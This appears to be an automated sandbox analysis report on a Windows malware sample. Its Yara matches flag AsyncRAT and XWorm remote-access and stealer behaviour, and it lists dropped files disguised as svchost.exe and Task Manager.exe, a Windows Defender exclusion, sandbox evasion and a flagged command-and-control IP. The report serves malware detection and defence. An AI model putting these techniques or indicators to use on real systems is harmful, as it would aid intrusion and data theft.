Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Yara detected AsyncRAT
Source: Yara match File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED

Stealing of Sensitive Information
barindex
Yara detected XWorm
Source: Yara match File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dLRcE11Dkl.exe PID: 2848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: All function.cmd PID: 5032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Task Manager.exe PID: 6876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected XWorm
Source: Yara match File source: 7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2eafcc0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.28278a8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.2815e68.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2ec0300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.svchost.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2ec0300.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.Task Manager.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.All function.cmd.2eafcc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.All function.exe.2e17bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.2121593204.00000000003B2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.2116819375.0000000000A22000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2171697039.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dLRcE11Dkl.exe PID: 2848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: All function.cmd PID: 5032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 1020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Task Manager.exe PID: 6876, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: All function.exe PID: 1472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: BLACKGODDOM V.2 GOD BY LA.exe PID: 5492, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Task Manager.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561590 Sample: dLRcE11Dkl.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 76 ip-api.com 2->76 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 Malicious sample detected (through community Yara rule) 2->102 104 21 other signatures 2->104 11 dLRcE11Dkl.exe 4 2->11         started        signatures3 process4 file5 66 C:\Users\user\AppData\Roaming\svchost.exe, PE32 11->66 dropped 68 C:\Users\user\AppData\...\All function.cmd, PE32 11->68 dropped 70 C:\Users\user\AppData\...\dLRcE11Dkl.exe.log, CSV 11->70 dropped 112 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->112 114 Drops PE files with benign system names 11->114 15 All function.cmd 4 11->15         started        19 svchost.exe 3 11->19         started        signatures6 process7 dnsIp8 72 C:\Users\user\AppData\...\Task Manager.exe, PE32 15->72 dropped 74 C:\Users\user\AppData\...\All function.exe, PE32 15->74 dropped 80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->80 22 All function.exe 4 15->22         started        26 Task Manager.exe 14 3 15->26         started        78 ip-api.com 208.95.112.1, 49707, 49710, 49712 TUT-ASUS United States 19->78 82 Antivirus detection for dropped file 19->82 84 System process connects to network (likely due to code injection or exploit) 19->84 86 Multi AV Scanner detection for dropped file 19->86 88 3 other signatures 19->88 28 powershell.exe 19->28         started        30 powershell.exe 19->30         started        file9 signatures10 process11 file12 62 C:\Users\user\...\Ratty_win32_directx11.exe, PE32+ 22->62 dropped 64 C:\Users\...\BLACKGODDOM V.2 GOD BY LA.exe, PE32 22->64 dropped 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->106 32 BLACKGODDOM V.2 GOD BY LA.exe 14 3 22->32         started        35 Ratty_win32_directx11.exe 22->35         started        108 Adds a directory exclusion to Windows Defender 26->108 37 powershell.exe 26->37         started        39 powershell.exe 26->39         started        110 Loading BitLocker PowerShell Module 28->110 41 conhost.exe 28->41         started        43 conhost.exe 30->43         started        signatures13 process14 signatures15 90 Adds a directory exclusion to Windows Defender 32->90 45 powershell.exe 32->45         started        48 powershell.exe 32->48         started        50 powershell.exe 32->50         started        92 Multi AV Scanner detection for dropped file 35->92 94 Machine Learning detection for dropped file 35->94 96 Loading BitLocker PowerShell Module 37->96 52 conhost.exe 37->52         started        54 conhost.exe 39->54         started        process16 signatures17 116 Loading BitLocker PowerShell Module 45->116 56 conhost.exe 45->56         started        58 conhost.exe 48->58         started        60 conhost.exe 50->60         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
208.95.112.1
 ip-api.com United States
53334 TUT-ASUS false

Contacted Domains

Name IP Active
ip-api.com 208.95.112.1 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
45.141.27.222 true
  • Avira URL Cloud: safe
 unknown
http://ip-api.com/line/?fields=hosting false
    		high